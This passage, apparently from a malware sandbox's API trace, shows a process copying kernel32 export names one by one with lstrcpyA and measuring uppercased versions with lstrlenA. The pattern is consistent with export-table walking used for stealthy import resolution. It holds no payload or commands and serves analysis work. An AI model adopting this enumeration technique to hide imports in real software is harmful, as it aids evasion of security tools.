lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.528] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.528] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.528] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.528] lstrlenA (lpString="ADDATOMA") returned 8 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.528] lstrlenA (lpString="ADDATOMW") returned 8 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.528] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.528] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.528] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.528] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.528] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.528] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.529] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.529] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.529] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.529] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.529] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.529] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.529] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.529] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.529] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.529] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.529] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.529] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.529] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.529] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.529] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.529] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.529] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.529] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.529] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.530] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.530] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.530] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.530] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.530] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.530] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.530] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.530] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.530] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.530] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.530] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.530] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.530] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.530] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.530] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.530] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.530] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.530] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.531] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.531] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.531] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.531] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.531] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.531] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.531] lstrlenA (lpString="BEEP") returned 4 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.531] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.531] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.531] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.531] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.531] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.531] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.531] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.531] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.531] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.531] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.531] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.532] lstrlenA (lpString="CANCELIO") returned 8 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.532] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.532] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.532] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.532] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.532] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.532] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.532] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.532] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.532] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.532] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.532] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.532] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.532] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.532] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.532] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.532] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.532] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.533] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.533] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.533] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.533] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.533] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.533] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.533] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.533] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.533] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.533] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.533] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.533] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.533] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.533] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.533] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.533] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.533] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.533] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.534] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.534] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.534] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.534] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.534] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.534] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.534] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.534] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.534] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.534] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.534] lstrlenA (lpString="COPYFILEA") returned 9 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.534] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.534] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.534] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.534] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.534] lstrlenA (lpString="COPYFILEW") returned 9 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.534] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.534] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.535] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.535] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, 